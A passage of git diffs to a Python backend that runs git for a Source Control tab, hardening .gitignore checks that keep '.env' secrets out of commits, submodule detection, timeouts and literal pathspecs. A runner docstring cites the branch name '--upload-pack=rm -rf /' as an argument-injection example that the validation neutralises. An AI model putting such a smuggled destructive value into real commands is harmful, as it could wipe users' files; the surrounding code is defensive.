-    ignore ``.env`` at all -- measured, ``git check-ignore -v -- .env``
-    exits 1 against it and the file shows as ``?? .env``. Stripping it here
-    would read an indented line as the rule already being present and leave
-    the working one unwritten, which is the leak direction.
+    SPACES ONLY, and that is the whole reason this is a function rather
+    than a ``strip()``. ``str.rstrip()`` with no argument also eats a TAB
+    and a non-breaking space, and git keeps both: measured on git 2.53,
+    ``.env\\t``, ``.env\\t ``, ``.env\\xa0`` and ``/.env\\t`` all leave the
+    file listed as ``?? .env``. Reading one of those as the rule already
+    being present would leave the working line unwritten -- the leak
+    direction.
+
+    LEADING whitespace is NOT removed either, for the same reason: a line
+    reading ``  .env`` is a pattern for a file whose name begins with two
+    spaces, and a ``.gitignore`` saying that does not ignore ``.env`` at
+    all.
 
     Everything else is left exactly as written, so it simply does not
     compare equal: a glob (``*.env``), a directory-only rule (``.env/``), a
@@ -205,7 +213,7 @@ def _ignore_rule(line: str) -> str:
     direction to be wrong in: a duplicate rule does nothing, and a missing
     one is the user's API keys in a public repository.
     """
-    text = line.rstrip()
+    text = line.rstrip(" ")
     if text.startswith("/"):
         text = text[1:]
     return text

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -404,11 +404,44 @@ def index_entries(root: Path, paths: Sequence[str]) -> list[tuple[str, str]]:
     """
     result = run_git(["ls-files", "--stage", "-z", "--", *paths], cwd=root,
                      timeout=T_READ, read_only=True)
+    return _mode_entries(result.out)
+
+
+def tree_entries(root: Path, rev: str,
+                 paths: Sequence[str]) -> list[tuple[str, str]]:
+    """``(mode, path)`` for every entry of *rev*'s tree matching *paths*.
+
+    What :func:`index_entries` asks of the index, asked of a commit, and it
+    exists for the same reason: mode :data:`GITLINK_MODE` is the only thing
+    that says SUBMODULE. ``cat-file -t`` cannot say it for a real one -- the
+    commit a gitlink names lives in the OTHER repository, so this one
+    answers "git cat-file: could not get object info", exit 128 (measured on
+    git 2.53), and the path reads as missing. The tree knows anyway, because
+    the entry is in it whether the object it points at is here or not.
+
+    An empty list for a rev that cannot be read: the caller is deciding
+    between two refusals, and "not a submodule" is the answer that leaves
+    the other one in place.
+    """
+    result = run_git(["ls-tree", "-z", rev, "--", *paths], cwd=root,
+                     timeout=T_READ, ok_codes=(0, 128), read_only=True)
+    if result.returncode != 0:
+        return []
+    return _mode_entries(result.out)
+
+
+def _mode_entries(out: str) -> list[tuple[str, str]]:
+    """Parse the ``<mode> ...<TAB><path>`` lines ``ls-files``/``ls-tree`` print.
+
+    Both formats put the mode first and the path after a TAB (``<mode> <sha>
+    <stage>`` for the index, ``<mode> <type> <sha>`` for a tree), and the
+    two callers want exactly those two fields -- so the split is written
+    once rather than twice with one of them subtly wrong.
+    """
     entries: list[tuple[str, str]] = []
-    for line in result.out.split("\x00"):
+    for line in out.split("\x00"):
         if not line:
             continue
-        # ``<mode> <sha> <stage>\t<path>``
         head, _, path = line.partition("\t")
         mode = head.split(" ", 1)[0]
         if path:

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -46,12 +46,6 @@ from .status import parse_porcelain_v2
 #: which is meant to be committed.
 ENV_IGNORE_LINE = ".env"
 
-#: A trailing comment as a PERSON writes one: whitespace, then ``#``. git
-#: reads a comment only in the first column, so this is stripped because of
-#: what the author meant, not because of what git does -- see
-#: :func:`_ignores_env`.
-_TRAILING_COMMENT_RE = re.compile(r"\s+#.*$")
-
 #: What to tell somebody whose stage / unstage / discard went through a
 #: link. Worded differently from the read side's "symbolic links are not
 #: served" on purpose: nothing was served, and what was refused was a WRITE
@@ -147,29 +141,29 @@ def ensure_scaffold(root: Path) -> list[str]:
 
 
 def _ignores_env(path: Path) -> bool:
-    """Is ``.env`` already ignored -- in any of the ways people write it?
+    """Would this ``.gitignore`` already keep a FILE called ``.env`` out?
 
-    Four spellings mean the same thing to whoever typed them: ``.env``,
-    ``/.env`` (the same rule, anchored to the repository root), ``.env/``
-    and either of those with trailing spaces or a trailing comment after
-    it. Reading only the first made :func:`ensure_scaffold` append a SECOND
-    ``.env`` to a file that plainly already had one, which reads as a bug in
-    the tab and leaves the user's own file worse than it found it.
+    The question is git's, not the author's. Two spellings answer yes --
+    ``.env`` and ``/.env``, either of them with trailing whitespace, which
+    git drops before matching -- and reading only the first made
+    :func:`ensure_scaffold` append a second ``.env`` under a line that
+    plainly already did the job.
 
-    Two of those spellings do not, by git's own rules, ignore a FILE called
-    ``.env``: ``.env/`` matches a directory only, and ``#`` starts a comment
-    just in the first column, so ``.env  # secrets`` is a pattern with a
-    comment inside it. They still count here, and that is the deliberate
-    half of this function. ``ensure_scaffold`` never rewrites a file the
-    user already has, and a line naming ``.env`` is the author's own
-    decision about it; appending a rule beside their near-miss would leave
-    two lines about ``.env`` -- one of which does nothing -- rather than
-    telling anybody the first one was wrong.
+    Everything else answers NO, including the two near-misses that look like
+    they should count. ``.env/`` is a directory-only pattern and does not
+    match a file; ``.env  # secrets`` is not a rule with a comment on it,
+    because ``.gitignore`` has no trailing comments -- it is a pattern
+    matching a file with that entire name. Somebody who wrote either of
+    those believes their secrets are ignored and they are not, so the line
+    goes in. A duplicate rule is harmless; a missing one is the leak this
+    whole scaffold exists to prevent, and that asymmetry is what decides
+    every uncertain case here.
 
-    An un-ignore rule is the one spelling that must NOT count, which is why
-    :func:`_ignore_rule` leaves the leading ``!`` where it is: this file
-    holds the user's API keys, and the tab is not the place where "commit my
-    secrets" is honoured by accident.
+    An un-ignore rule is the same call for a different reason: ``!.env``
+    does not count, the appended rule goes in after it, and the last
+    matching rule is the one git obeys. This file holds the user's API keys,
+    and the tab is not the place where "commit my secrets" is honoured by
+    accident.
 
     Decoded with ``errors="replace"`` because this only ever asks a question
     about ASCII: a ``.gitignore`` in some other encoding must not make this
@@ -184,24 +178,25 @@ def _ignores_env(path: Path) -> bool:
 
 
 def _ignore_rule(line: str) -> str:
-    """The path one ``.gitignore`` line is about, near enough to compare.
+    """The file one ``.gitignore`` line matches, as far as this check goes.
 
     Not a gitignore parser and not trying to be -- no globs, no negation
-    semantics, no directory matching. It removes the four things a person
-    writes AROUND a rule (surrounding whitespace, a trailing comment, the
-    leading ``/`` that anchors it to the root, the trailing ``/`` that
-    restricts it to a directory) and hands back what is left; a whole-line
-    comment comes back empty. Everything it cannot account for -- ``*.env``,
-    a pattern with a glob in it -- simply does not compare equal, which
-    means the scaffold appends its own line, which is the safe direction to
-    be wrong in.
+    semantics, no directory matching. It removes the only two things git
+    itself removes from a line before matching it against a file at the top
+    level: surrounding whitespace (git drops trailing spaces unless they are
+    escaped), and the leading ``/`` that anchors a rule to the repository
+    root, which for a root-level file changes nothing about what it matches.
+
+    Everything else is left exactly as written, so it simply does not
+    compare equal: a glob (``*.env``), a directory-only rule (``.env/``), a
+    line with what its author took for a comment on the end (``.env  #
+    secrets`` -- git has no trailing comments, so that pattern matches a
+    file with that whole name), and an un-ignore rule (``!.env``). Every one
+    of those makes the scaffold append its own line, which is the safe
+    direction to be wrong in: a duplicate rule does nothing, and a missing
+    one is the user's API keys in a public repository.
     """
     text = line.strip()
-    if text.startswith("#"):
-        return ""
-    text = _TRAILING_COMMENT_RE.sub("", text).strip()
-    if text.endswith("/"):
-        text = text[:-1]
     if text.startswith("/"):
         text = text[1:]
     return text

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -149,15 +149,16 @@ def _ignores_env(path: Path) -> bool:
     :func:`ensure_scaffold` append a second ``.env`` under a line that
     plainly already did the job.
 
-    Everything else answers NO, including the two near-misses that look like
-    they should count. ``.env/`` is a directory-only pattern and does not
-    match a file; ``.env  # secrets`` is not a rule with a comment on it,
-    because ``.gitignore`` has no trailing comments -- it is a pattern
-    matching a file with that entire name. Somebody who wrote either of
-    those believes their secrets are ignored and they are not, so the line
-    goes in. A duplicate rule is harmless; a missing one is the leak this
-    whole scaffold exists to prevent, and that asymmetry is what decides
-    every uncertain case here.
+    Everything else answers NO, including the three near-misses that look
+    like they should count. ``.env/`` is a directory-only pattern and does
+    not match a file; ``.env  # secrets`` is not a rule with a comment on
+    it, because ``.gitignore`` has no trailing comments -- it is a pattern
+    matching a file with that entire name; and ``  .env`` keeps its leading
+    spaces, so it matches a file whose name starts with two of them.
+    Whoever wrote any of the three believes their secrets are ignored and
+    they are not, so the line goes in. A duplicate rule is harmless; a
+    missing one is the leak this whole scaffold exists to prevent, and that
+    asymmetry is what decides every uncertain case here.
 
     An un-ignore rule is the same call for a different reason: ``!.env``
     does not count, the appended rule goes in after it, and the last
@@ -183,9 +184,17 @@ def _ignore_rule(line: str) -> str:
     Not a gitignore parser and not trying to be -- no globs, no negation
     semantics, no directory matching. It removes the only two things git
     itself removes from a line before matching it against a file at the top
-    level: surrounding whitespace (git drops trailing spaces unless they are
-    escaped), and the leading ``/`` that anchors a rule to the repository
-    root, which for a root-level file changes nothing about what it matches.
+    level: TRAILING whitespace, which git drops unless it is escaped, and
+    the leading ``/`` that anchors a rule to the repository root, which for
+    a root-level file changes nothing about what it matches.
+
+    LEADING whitespace is NOT removed, and the difference is not pedantry.
+    git keeps it: a line reading ``  .env`` is a pattern for a file whose
+    name begins with two spaces, and a ``.gitignore`` saying that does not
+    ignore ``.env`` at all -- measured, ``git check-ignore -v -- .env``
+    exits 1 against it and the file shows as ``?? .env``. Stripping it here
+    would read an indented line as the rule already being present and leave
+    the working one unwritten, which is the leak direction.
 
     Everything else is left exactly as written, so it simply does not
     compare equal: a glob (``*.env``), a directory-only rule (``.env/``), a
@@ -196,7 +205,7 @@ def _ignore_rule(line: str) -> str:
     direction to be wrong in: a duplicate rule does nothing, and a missing
     one is the user's API keys in a public repository.
     """
-    text = line.strip()
+    text = line.rstrip()
     if text.startswith("/"):
         text = text[1:]
     return text

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -381,6 +381,13 @@ def _in_progress(root: Path) -> tuple[bool, bool]:
 #: this tab offers would be about the wrong one.
 GITLINK_MODE = "160000"
 
+#: What to tell somebody who named one. ONE sentence for every refusal in
+#: every module -- a diff, a file read and a discard all mean the same thing
+#: by it -- because two wordings of one rule are two rules as far as the
+#: person reading them is concerned.
+SUBMODULE_HINT = ("submodules are not managed here; open that repository "
+                  "instead")
+
 
 def index_entries(root: Path, paths: Sequence[str]) -> list[tuple[str, str]]:
     """``(mode, path)`` for every index entry matching *paths*.
@@ -550,6 +557,22 @@ def resolve_commit(root: Path, sha: str) -> str:
         raise GitError("not_found", 404, f"no commit {clean} in this repository",
                        hint="the history may have been rewritten; reload the log")
     return full
+
+
+def commit_trees(root: Path, sha: str) -> tuple[str, str | None, list[str]]:
+    """The commit *sha* names, its first parent, and the trees to diff.
+
+    One owner for a rule that was written out twice and has to mean the same
+    thing in both places: a commit is compared with its FIRST PARENT, and a
+    root commit -- which has none -- with the empty tree, which is what git
+    spells ``--root``. ``log.commit_files`` and ``diff``'s commit scope both
+    need all three values, and a helper that returned only the trees would
+    make each of them resolve the commit a second time.
+    """
+    commit = resolve_commit(root, sha)
+    parent = first_parent(root, commit)
+    trees = [parent, commit] if parent is not None else ["--root", commit]
+    return commit, parent, trees
 
 
 def first_parent(root: Path, commit: str) -> str | None:

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -38,7 +38,7 @@ from ..project import PROJECT_GITATTRIBUTES, PROJECT_GITIGNORE
 from .errors import GitError
 from .models import ConfigScope, GitStatus, Identity
 from .paths import validate_identity, validate_sha
-from .runner import T_LOCAL, T_STATUS, run_git
+from .runner import T_LOCAL, T_READ, T_STATUS, run_git
 from .status import parse_porcelain_v2
 
 #: The line ``.gitignore`` has to contain for the project's secrets to stay
@@ -355,13 +355,18 @@ def _in_progress(root: Path) -> tuple[bool, bool]:
     absolute path replaces the root.
 
     Fewer than three lines means a git that answered something this does not
-    understand. "No merge in progress" is the safe answer to that -- it
-    leaves the buttons enabled and lets git itself refuse -- and a status
-    read must not fail over a flag.
+    understand, and a FAILURE means one that could not answer at all (a
+    repository being rewritten under us, a ``rev-parse`` that timed out
+    behind a lock). "No merge in progress" is the safe answer to both -- it
+    leaves the buttons enabled and lets git itself refuse the operation --
+    and the status the whole tab is drawn from must not die over a flag.
     """
-    result = run_git(["rev-parse", *(arg for path in IN_PROGRESS_PATHS
-                                     for arg in ("--git-path", path))],
-                     cwd=root, timeout=T_STATUS, read_only=True)
+    try:
+        result = run_git(["rev-parse", *(arg for path in IN_PROGRESS_PATHS
+                                         for arg in ("--git-path", path))],
+                         cwd=root, timeout=T_STATUS, read_only=True)
+    except GitError:
+        return False, False
     lines = result.out.splitlines()
     if len(lines) < len(IN_PROGRESS_PATHS):
         return False, False
@@ -391,7 +396,7 @@ def index_entries(root: Path, paths: Sequence[str]) -> list[tuple[str, str]]:
     compare a SET of the names for that reason.
     """
     result = run_git(["ls-files", "--stage", "-z", "--", *paths], cwd=root,
-                     timeout=T_STATUS, read_only=True)
+                     timeout=T_READ, read_only=True)
     entries: list[tuple[str, str]] = []
     for line in result.out.split("\x00"):
         if not line:
@@ -437,7 +442,7 @@ def _config_value(root: Path, key: str) -> tuple[str | None, ConfigScope | None]
     not a failure -- hence ``ok_codes``.
     """
     result = run_git(["config", "--show-origin", "--get", key], cwd=root,
-                     timeout=T_STATUS, ok_codes=(0, 1), read_only=True)
+                     timeout=T_READ, ok_codes=(0, 1), read_only=True)
     if result.returncode != 0:
         return None, None
     origin, _, value = result.out.rstrip("\n").partition("\t")
@@ -538,7 +543,7 @@ def resolve_commit(root: Path, sha: str) -> str:
     """
     clean = validate_sha(sha)
     result = run_git(["rev-parse", "--verify", "--quiet", f"{clean}^{{commit}}"],
-                     cwd=root, timeout=T_STATUS, ok_codes=(0, 1),
+                     cwd=root, timeout=T_READ, ok_codes=(0, 1),
                      read_only=True)
     full = result.out.strip()
     if result.returncode != 0 or not full:
@@ -558,7 +563,7 @@ def first_parent(root: Path, commit: str) -> str | None:
     is one extra process and is exactly right on every version.
     """
     result = run_git(["rev-parse", "--verify", "--quiet", f"{commit}^"],
-                     cwd=root, timeout=T_STATUS, ok_codes=(0, 1),
+                     cwd=root, timeout=T_READ, ok_codes=(0, 1),
                      read_only=True)
     parent = result.out.strip()
     return parent if result.returncode == 0 and parent else None

--- a/backend/app/core/git/repo.py
+++ b/backend/app/core/git/repo.py
@@ -30,6 +30,7 @@ about one file or one commit's contents:
 from __future__ import annotations
 
 import re
+from collections.abc import Sequence
 from pathlib import Path
 
 from ..project import PROJECT_GITATTRIBUTES, PROJECT_GITIGNORE
@@ -190,6 +191,51 @@ def _in_progress(root: Path) -> tuple[bool, bool]:
         return False, False
     merge_head, rebase_merge, rebase_apply = (root / line for line in lines[:3])
     return merge_head.exists(), rebase_merge.exists() or rebase_apply.exists()
+
+
+# --- the index -------------------------------------------------------------
+
+#: The index mode of a gitlink -- a submodule's entry in its parent. Not a
+#: file: what is at that path is another repository, and every operation
+#: this tab offers would be about the wrong one.
+GITLINK_MODE = "160000"
+
+
+def index_entries(root: Path, paths: Sequence[str]) -> list[tuple[str, str]]:
+    """``(mode, path)`` for every index entry matching *paths*.
+
+    One reader for the two questions the index answers that no other command
+    does: which paths are SUBMODULES (mode :data:`GITLINK_MODE`, which the
+    status parser does not carry), and which names a pathspec actually
+    matches -- ``sub`` matching ``sub/.env`` is how a request for one file
+    becomes a diff of a whole directory.
+
+    An UNMERGED path appears once per stage, all three with the same name;
+    the caller that cares about "exactly this path and nothing else" should
+    compare a SET of the names for that reason.
+    """
+    result = run_git(["ls-files", "--stage", "-z", "--", *paths], cwd=root,
+                     timeout=T_STATUS, read_only=True)
+    entries: list[tuple[str, str]] = []
+    for line in result.out.split("\x00"):
+        if not line:
+            continue
+        # ``<mode> <sha> <stage>\t<path>``
+        head, _, path = line.partition("\t")
+        mode = head.split(" ", 1)[0]
+        if path:
+            entries.append((mode, path))
+    return entries
+
+
+def submodule_paths(root: Path, paths: Sequence[str]) -> list[str]:
+    """Which of *paths* the index holds as submodules.
+
+    Asked of the INDEX rather than of the disk, because that is where the
+    answer is unambiguous: mode 160000 is a gitlink and nothing else is.
+    """
+    return [path for mode, path in index_entries(root, paths)
+            if mode == GITLINK_MODE]
 
 
 # --- who commits -----------------------------------------------------------

--- a/backend/app/core/git/runner.py
+++ b/backend/app/core/git/runner.py
@@ -5,11 +5,15 @@ on purpose: a second call site is a second chance to forget one of the five
 things below, and every one of them fails in a way that is hard to trace
 back to the command that caused it.
 
-* **Never a shell, and never user input as an option.** Every argument is a
-  list element, every path and ref is validated against a closed grammar in
-  ``paths.py``, and the caller puts them after ``--`` wherever git accepts
-  it. A branch called ``--upload-pack=rm -rf /`` is then a branch name that
-  does not exist, not a command.
+* **Never a shell, never user input as an option, and never a pattern.**
+  Every argument is a list element, every path and ref is validated against
+  a closed grammar in ``paths.py``, and the caller puts them after ``--``
+  wherever git accepts it. A branch called ``--upload-pack=rm -rf /`` is
+  then a branch name that does not exist, not a command. And because the
+  prefix carries ``--literal-pathspecs`` (:data:`GIT_PREFIX_ARGS`), a path
+  is the file with that name rather than a glob: without it ``*`` means
+  every file in the repository and ``[.]env`` means ``.env``, so validating
+  the name the browser sent would say nothing about the file git opens.
 * **Never interactive.** A server has no terminal, so a git that decides to
   ask for a password does not get an answer -- it gets a request that never
   returns and a worker that never comes back. :data:`NON_INTERACTIVE_ENV`
@@ -59,6 +63,20 @@ from pathlib import Path
 from ..packs.runner import creation_flags, pip_env, stop_process
 from .errors import GitError, classify_failure
 
+#: The option that turns every path this package passes into a NAME rather
+#: than a pattern. Without it ``*`` is every file in the repository,
+#: ``[.]env`` is ``.env`` and ``.en?`` is too -- so a validator that checked
+#: the string the browser sent would have said nothing about the file git
+#: opens. With it, ``git add -- '*'`` stages a file literally called ``*``
+#: or fails, and a diff of ``[.]env`` cannot come back holding the user's
+#: API keys. (git >= 1.9; the argument form of ``GIT_LITERAL_PATHSPECS=1``.)
+#:
+#: ``git check-ignore`` is the one command that REFUSES it -- "pathspec
+#: magic not supported by this command: 'literal'", exit 128 -- so
+#: :func:`run_git` takes a flag to leave it off for that one call. See there
+#: for why that is safe.
+LITERAL_PATHSPECS = "--literal-pathspecs"
+
 #: The options every call carries, between the executable and the caller's
 #: arguments (the ``-C <cwd>`` that precedes them is per call).
 #:
@@ -68,7 +86,8 @@ from .errors import GitError, classify_failure
 #: without it, a machine with Git Credential Manager configured pops a
 #: dialog on the SERVER and the request hangs until it is answered.
 #: ``color.ui=never`` keeps ANSI escapes out of output that is parsed.
-GIT_CONFIG_ARGS: tuple[str, ...] = (
+GIT_PREFIX_ARGS: tuple[str, ...] = (
+    LITERAL_PATHSPECS,
     "-c", "core.quotepath=false",
     "-c", "core.askPass=",
     "-c", "color.ui=never",
@@ -358,13 +377,22 @@ class GitResult:
         return self.stderr.decode("utf-8", errors="replace")
 
 
-def _argv(git: str, cwd: Path, args: Sequence[str]) -> list[str]:
+def _argv(git: str, cwd: Path, args: Sequence[str], *,
+          literal_pathspecs: bool = True) -> list[str]:
     """The full command line: executable, ``-C <cwd>``, fixed options, *args*.
 
     *cwd* is resolved, so the ``-C`` git is handed is an absolute path with
     no ``..`` in it even when the caller kept a relative one.
+
+    *literal_pathspecs* is only ever False for ``check-ignore``, which is the
+    one command that REJECTS the option: it answers "pathspec magic not
+    supported by this command: 'literal'" and exits 128. See
+    :func:`run_git`.
     """
-    return [git, "-C", str(cwd.resolve()), *GIT_CONFIG_ARGS, *args]
+    prefix = (GIT_PREFIX_ARGS if literal_pathspecs
+              else tuple(arg for arg in GIT_PREFIX_ARGS
+                         if arg != LITERAL_PATHSPECS))
+    return [git, "-C", str(cwd.resolve()), *prefix, *args]
 
 
 def _drain(proc: subprocess.Popen) -> None:
@@ -382,7 +410,8 @@ def _drain(proc: subprocess.Popen) -> None:
 
 def _run(args: Sequence[str], *, cwd: Path, timeout: float,
          env: dict[str, str], input_bytes: bytes | None = None,
-         ok_codes: Container[int] = (0,)) -> GitResult:
+         ok_codes: Container[int] = (0,),
+         literal_pathspecs: bool = True) -> GitResult:
     """Run one git command with a PREBUILT environment.
 
     Private because the environment is not the caller's business:
@@ -394,7 +423,7 @@ def _run(args: Sequence[str], *, cwd: Path, timeout: float,
     if git is None:
         raise GitError("git_missing", 503,
                        hint="install git and make sure it is on PATH")
-    argv = _argv(git, cwd, args)
+    argv = _argv(git, cwd, args, literal_pathspecs=literal_pathspecs)
 
     try:
         proc = subprocess.Popen(
@@ -439,7 +468,8 @@ def _run(args: Sequence[str], *, cwd: Path, timeout: float,
 def run_git(args: Sequence[str], *, cwd: Path, timeout: float,
             input_bytes: bytes | None = None,
             ok_codes: Container[int] = (0,),
-            read_only: bool = False) -> GitResult:
+            read_only: bool = False,
+            literal_pathspecs: bool = True) -> GitResult:
     """Run ``git <args>`` in *cwd* and return what it said.
 
     *args* is everything after the fixed prefix -- the subcommand and its
@@ -462,7 +492,16 @@ def run_git(args: Sequence[str], *, cwd: Path, timeout: float,
 
     *read_only* marks a command that only reads, so it can run without
     taking the index lock (see :func:`git_env`).
+
+    *literal_pathspecs* is True everywhere except ``check-ignore``, which is
+    the one command that rejects :data:`LITERAL_PATHSPECS` outright. Leaving
+    it off there is safe because that command answers a QUESTION -- is this
+    path ignored -- and never returns content: the worst a pattern can do is
+    have the answer come back about a file other than the one asked for,
+    which refuses a read that would otherwise have been refused a step later
+    for not existing. Every command that hands back a file's bytes keeps it.
     """
     return _run(args, cwd=cwd, timeout=timeout,
                 env=git_env(read_only=read_only),
-                input_bytes=input_bytes, ok_codes=ok_codes)
+                input_bytes=input_bytes, ok_codes=ok_codes,
+                literal_pathspecs=literal_pathspecs)

--- a/backend/app/core/git/runner.py
+++ b/backend/app/core/git/runner.py
@@ -30,11 +30,19 @@ back to the command that caused it.
   :attr:`GitResult.out` / :attr:`GitResult.err`'s job -- utf-8 with
   ``errors="replace"``, which is what ``core/project.py`` has always done
   for git output on a cp950 machine.
-* **A killable process tree.** ``creation_flags()`` gives the child its own
-  Windows process group so that a timeout can reach ``git`` AND the
-  ``ssh``/``curl`` it spawned; ``stop_process()`` is the same kill the
-  Package Center uses. A git that hangs on a network read holds an index
-  lock, so leaving one behind breaks the NEXT request too.
+* **A killable process tree -- on Windows.** ``creation_flags()`` gives the
+  child its own Windows process group and ``stop_process()`` ends it with
+  ``taskkill /T``, so a timeout reaches ``git`` AND the ``ssh``/``curl`` it
+  spawned; it is the same kill the Package Center uses. On POSIX it is NOT
+  a tree: ``creation_flags()`` is 0 there and ``stop_process()`` calls
+  ``terminate()`` on the child alone, so a git killed mid-fetch can leave
+  an ``ssh`` behind. That is stated rather than glossed because it is only
+  survivable while nothing here talks to a network: every G1 command is
+  local, and a local git has no long-lived children. G3 adds the ones that
+  do, and owes this module a process group of its own on POSIX
+  (``start_new_session=True`` and a kill aimed at the group) before it
+  ships them. A git that hangs on a network read holds an index lock, so
+  leaving one behind breaks the NEXT request too.
 * **An environment scrubbed of the caller's repository.** ``GIT_DIR`` and
   its five friends (:data:`REPOSITORY_ENV_VARS`) name a repository; if the
   server was started from a shell inside a git hook, every command here
@@ -510,12 +518,23 @@ def run_git(args: Sequence[str], *, cwd: Path, timeout: float,
     taking the index lock (see :func:`git_env`).
 
     *literal_pathspecs* is True everywhere except ``check-ignore``, which is
-    the one command that rejects :data:`LITERAL_PATHSPECS` outright. Leaving
-    it off there is safe because that command answers a QUESTION -- is this
-    path ignored -- and never returns content: the worst a pattern can do is
-    have the answer come back about a file other than the one asked for,
-    which refuses a read that would otherwise have been refused a step later
-    for not existing. Every command that hands back a file's bytes keeps it.
+    the one command that rejects :data:`LITERAL_PATHSPECS` outright ("pathspec
+    magic not supported by this command: 'literal'", exit 128). Leaving it
+    off there rests on two facts, and the second is the load-bearing one:
+
+    * that command answers a QUESTION -- is this path ignored -- and never
+      returns content, so the worst a pattern could do is have the answer
+      come back about a file other than the one asked for, which refuses a
+      read that would otherwise have been refused a step later for not
+      existing;
+    * pathspec MAGIC cannot reach it at all, because every form of it
+      (``:(glob)``, ``:!``, ``:/``, ``:(icase)``) begins with a COLON, and
+      ``paths.validate_rel_path`` -- which every caller runs first -- refuses
+      a colon anywhere in a path. That rule is not only about Windows
+      alternate data streams; it is what makes this exemption safe, and it
+      must not be relaxed while the exemption exists.
+
+    Every command that hands back a file's bytes keeps the option.
     """
     return _run(args, cwd=cwd, timeout=timeout,
                 env=git_env(read_only=read_only),

--- a/backend/app/core/git/runner.py
+++ b/backend/app/core/git/runner.py
@@ -249,7 +249,10 @@ def _ssh_command_configured() -> bool:
     Any failure counts as "no": git missing, a timeout, a config file the
     user cannot read. The consequence of guessing wrong here is one ssh run
     in batch mode instead of theirs, which fails fast; the consequence of
-    raising would be that a config problem broke every git command.
+    raising would be that a config problem broke every git command. A
+    failure is NOT remembered, though -- a guess must not outlive the
+    condition that produced it and go on overriding a setting the user
+    made.
     """
     global _ssh_configured
 
@@ -260,7 +263,6 @@ def _ssh_command_configured() -> bool:
                       timeout=SSH_PROBE_TIMEOUT_S, env=_base_git_env(),
                       ok_codes=(0, 1))
     except GitError:
-        _ssh_configured = False
         return False
     _ssh_configured = result.returncode == 0 and bool(result.out.strip())
     return _ssh_configured

--- a/backend/app/core/git/runner.py
+++ b/backend/app/core/git/runner.py
@@ -130,6 +130,27 @@ SSH_PROBE_TIMEOUT_S = 5.0
 #: How long a killed process gets to hand back its pipes.
 DRAIN_TIMEOUT_S = 3.0
 
+#: How long each class of git command may take, in seconds. Every call in
+#: this package passes one of these, and ``service.py`` re-exports them so a
+#: route can name a timeout without importing the process layer.
+#:
+#: They live HERE, next to the ``timeout`` they are passed to, because every
+#: module that runs git needs them and the service imports all of those --
+#: the other way round would be a cycle.
+#:
+#: A status read is polled while the tab is open, so it is the shortest: ten
+#: seconds is already "something is holding the index lock". A local write
+#: (commit, checkout) runs the user's hooks, which can be a whole test
+#: suite, so it gets thirty. A read that walks history or a big blob gets
+#: twenty. Anything that talks to a remote is G3's and gets two minutes,
+#: which is a slow clone rather than a hung one -- the non-interactive
+#: environment turns a missing credential into an immediate failure, so a
+#: network call that is still running at two minutes is transferring.
+T_STATUS = 10
+T_LOCAL = 30
+T_READ = 20
+T_NETWORK = 120
+
 #: ``git version 2.53.0.windows.2`` -- the vendor suffix is deliberately not
 #: captured. Git for Windows and Apple's git both append their own build
 #: numbering, and a version check that tried to order those would be

--- a/backend/app/core/git/runner.py
+++ b/backend/app/core/git/runner.py
@@ -35,11 +35,12 @@ back to the command that caused it.
   base is ``packs.runner.pip_env()``, which already drops the variables
   that relocate a Python interpreter.
 
-``git_executable`` and ``git_version`` cache, and the shape of the caching
-is deliberate: a POSITIVE answer lasts for the life of the process (git does
-not move), a NEGATIVE one for :data:`MISSING_RECHECK_S` seconds, so a
-machine without git does not run ``shutil.which`` on every poll of the
-status endpoint -- and still notices an install a minute later without a
+``git_executable``, ``git_version`` and the ``core.sshCommand`` probe cache,
+and the shape of the caching is deliberate: a POSITIVE answer lasts for the
+life of the process (git does not move), a NEGATIVE one for
+:data:`MISSING_RECHECK_S` seconds, so a machine without git -- or with a git
+whose config cannot be read -- does not spawn a process on every poll of the
+status endpoint, and still notices a repair a minute later without a
 restart. ``_reset_for_tests`` exists because that cache would otherwise make
 the second test in a file depend on the first.
 """
@@ -142,6 +143,7 @@ _missing_until: float | None = None
 _version: tuple[int, int, int] | None = None
 _version_probed_at: float | None = None
 _ssh_configured: bool | None = None
+_ssh_probe_failed_at: float | None = None
 
 
 def _reset_for_tests() -> None:
@@ -152,12 +154,13 @@ def _reset_for_tests() -> None:
     a process would depend on which test ran first.
     """
     global _executable, _missing_until, _version, _version_probed_at
-    global _ssh_configured
+    global _ssh_configured, _ssh_probe_failed_at
     _executable = None
     _missing_until = None
     _version = None
     _version_probed_at = None
     _ssh_configured = None
+    _ssh_probe_failed_at = None
 
 
 def git_executable() -> str | None:
@@ -178,17 +181,22 @@ def git_executable() -> str | None:
 
 
 def _probe_cwd() -> Path:
-    """A directory that exists, for the calls that are not about a repository.
+    """A directory to run the calls that are not about a repository from.
 
-    ``git --version`` still goes through the fixed prefix, and ``-C`` needs
-    somewhere real to point at. The current directory normally is; a server
-    whose working directory has been deleted underneath it would otherwise
-    turn a version check into an ``OSError``.
+    ``git --version`` and the ``core.sshCommand`` probe still go through the
+    fixed prefix, and ``-C`` needs somewhere real to point at.
+
+    The temporary directory, and NEVER ``Path.cwd()``: the server's working
+    directory is its own checkout, which is a git repository the Source
+    Control tab must never consult. A ``core.sshCommand`` in THAT
+    repository's config would otherwise decide how the user's PROJECT
+    reaches its remotes -- a setting from a repository nobody asked about,
+    silently applied to another one. Only the global and system config can
+    answer this question, and the temp directory is the cheapest place to
+    stand where neither a repository nor a deleted working directory can
+    interfere.
     """
-    try:
-        return Path.cwd()
-    except OSError:
-        return Path(tempfile.gettempdir())
+    return Path(tempfile.gettempdir())
 
 
 def git_version() -> tuple[int, int, int] | None:
@@ -249,20 +257,37 @@ def _ssh_command_configured() -> bool:
     Any failure counts as "no": git missing, a timeout, a config file the
     user cannot read. The consequence of guessing wrong here is one ssh run
     in batch mode instead of theirs, which fails fast; the consequence of
-    raising would be that a config problem broke every git command. A
-    failure is NOT remembered, though -- a guess must not outlive the
-    condition that produced it and go on overriding a setting the user
-    made.
+    raising would be that a config problem broke every git command.
+
+    A failure is not remembered as an ANSWER -- a guess must not outlive the
+    condition that produced it and go on overriding a setting the user made
+    -- but it is remembered as a failure, for :data:`MISSING_RECHECK_S`
+    seconds. A host whose config genuinely cannot be read (an unreadable
+    ``.gitconfig``, a git that exits 128 on every ``config --get``) would
+    otherwise pay a whole process for this question on every single command,
+    forever: ``git_env`` is called once per git call, and the status
